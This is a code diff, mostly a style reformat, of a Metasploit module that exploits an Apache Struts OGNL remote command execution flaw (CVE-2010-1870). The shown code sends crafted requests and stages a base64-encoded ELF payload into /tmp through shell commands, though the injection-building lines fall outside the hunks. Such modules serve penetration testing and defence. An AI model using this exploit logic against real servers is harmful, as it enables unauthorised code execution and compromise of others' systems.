@@ -11,63 +11,72 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::EXE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Apache Struts Remote Command Execution',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache Struts Remote Command Execution',
+        'Description' => %q{
           This module exploits a remote command execution vulnerability in
-        Apache Struts versions < 2.2.0. This issue is caused by a failure to properly
-        handle unicode characters in OGNL extensive expressions passed to the web server.
+          Apache Struts versions < 2.2.0. This issue is caused by a failure to properly
+          handle unicode characters in OGNL extensive expressions passed to the web server.
 
           By sending a specially crafted request to the Struts application it is possible to
-        bypass the "#" restriction on ParameterInterceptors by using OGNL context variables.
-        Bypassing this restriction allows for the execution of arbitrary Java code.
-      },
-      'Author'         =>
-        [
+          bypass the "#" restriction on ParameterInterceptors by using OGNL context variables.
+          Bypassing this restriction allows for the execution of arbitrary Java code.
+        },
+        'Author' => [
           'bannedit', # metasploit module
           'Meder Kydyraliev', # original public exploit
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2010-1870'],
           [ 'OSVDB', '66280'],
           [ 'EDB', '14360' ],
         ],
-      'Platform'      => %w{ linux win },
-      'Privileged'     => true,
-      'Targets'        =>
-        [
-          ['Windows Universal',
+        'Platform' => %w{linux win},
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Windows Universal',
             {
-                'Arch' => ARCH_X86,
-                'Platform' => 'win',
-                'CmdStagerFlavor' => 'tftp'
+              'Arch' => ARCH_X86,
+              'Platform' => 'win',
+              'CmdStagerFlavor' => 'tftp'
             }
           ],
-          ['Linux Universal',
+          [
+            'Linux Universal',
             {
-                'Arch' => ARCH_X86,
-                'Platform' => 'linux'
+              'Arch' => ARCH_X86,
+              'Platform' => 'linux'
             }
           ],
         ],
-      'DisclosureDate' => '2010-07-13',
-      'DefaultTarget' => 0))
+        'DisclosureDate' => '2010-07-13',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(8080),
         OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2-blank-2.0.9/example/HelloWorld.action', ""]),
         OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
-      ])
+      ]
+    )
 
     self.needs_cleanup = true
   end
 
   def execute_command(cmd, opts = {})
-    uri =   normalize_uri(datastore['URI'])
-    uri =   Rex::Text::uri_encode(uri)
+    uri = normalize_uri(datastore['URI'])
+    uri = Rex::Text::uri_encode(uri)
     var_a = rand_text_alpha_lower(4)
     var_b = rand_text_alpha_lower(2)
     var_c = rand_text_alpha_lower(4)
@@ -83,9 +92,9 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Attempting to execute: #{cmd}")
 
     resp = send_request_raw({
-      'uri'     => uri,
+      'uri' => uri,
       'version' => '1.1',
-      'method'  => 'GET',
+      'method' => 'GET',
     }, 5)
   end
 
@@ -104,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
     exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
     base64 = Rex::Text.encode_base64(exe)
     base64.gsub!(/\=/, "\\u003d")
-    file = rand_text_alphanumeric(4+rand(4))
+    file = rand_text_alphanumeric(4 + rand(4))
 
     execute_command("/bin/sh@-c@touch /tmp/#{file}.b64")
     cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
@@ -141,12 +150,12 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     case target['Platform']
-      when 'linux'
-        linux_stager
-      when 'win'
-        windows_stager
-      else
-        fail_with(Failure::NoTarget, 'Unsupported target platform!')
+    when 'linux'
+      linux_stager
+    when 'win'
+      windows_stager
+    else
+      fail_with(Failure::NoTarget, 'Unsupported target platform!')
     end
 
     handler
